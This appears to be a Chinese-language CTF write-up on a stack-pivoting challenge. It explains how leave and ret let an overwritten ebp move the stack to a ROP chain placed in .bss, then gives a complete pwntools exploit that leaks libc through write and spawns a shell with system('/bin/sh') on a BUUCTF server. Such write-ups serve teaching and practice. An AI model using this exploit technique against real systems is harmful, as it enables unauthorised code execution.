进去康康函数结构
第二个read函数可以溢出但是可以构造的rop链很短 0x20-0x18
不过可以用第一个read构造ROP链,且刚好在bss段中,之后栈迁移到该地址执行,后面就是常规的泄露libc来getshell
栈迁移
首先来介绍一下栈迁移是什么?
以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列栈操作:
push eip+4;
push ebp;
mov ebp,esp;
这些操作是用来保护现场,避免执行完函数后堆栈不平衡以及找不到之前的入口地址。
执行完函数后会进行一系列操作来还原现场
leave;
ret;
这边的leave就相当于进入函数栈操作的逆过程。
实际上,根据编译原理上介绍的leave和ret可以拆分成若干个move函数
leave == mov esp,ebp;pop ebp;
ret == pop eip #弹出栈顶数据给eip寄存器
这样如果能够控制栈空间到任意地址,那么我们就能利用ret来控制eip的数据(栈顶数据)。
此外,栈迁移主要是为了解决栈溢出可以溢出空间大小不足的问题。
其中pop eip相当于将栈顶数据给eip,由于ret返回的是栈顶数据,而栈顶地址是由esp的值决定的,esp的值,从leave可以得出是由ebp决定的。所以我们可以通过覆盖ebp的值来控制ret返回地址。两次leave ret即可控制esp为我们想要的地址。由于有pop ebp,会使esp-4,将ebp 覆盖为想要调整的位置-4即可
exp
from pwn import *
from LibcSearcher import *
r=remote('node3.buuoj.cn',27828)
#r=process('./spwn')
elf=ELF('./spwn')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
bss_addr=0x0804A300
leave_ret=0x08048511
payload=p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
r.recvuntil("What is your name?")
r.send(payload)
payload1=b'a'*0x18+p32(bss_addr-4)+p32(leave_ret)
r.recvuntil("What do you want to say?")
r.send(payload1)
write_addr=u32(r.recv(4))
print('[+]write_addr: ',hex(write_addr))
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump('str_bin_sh')
r.recvuntil("What is your name?")
payload=p32(system_addr)+p32(main_addr)+p32(bin_addr)
r.send(payload)
r.recvuntil("What do you want to say?")
r.send(payload1)
r.interactive()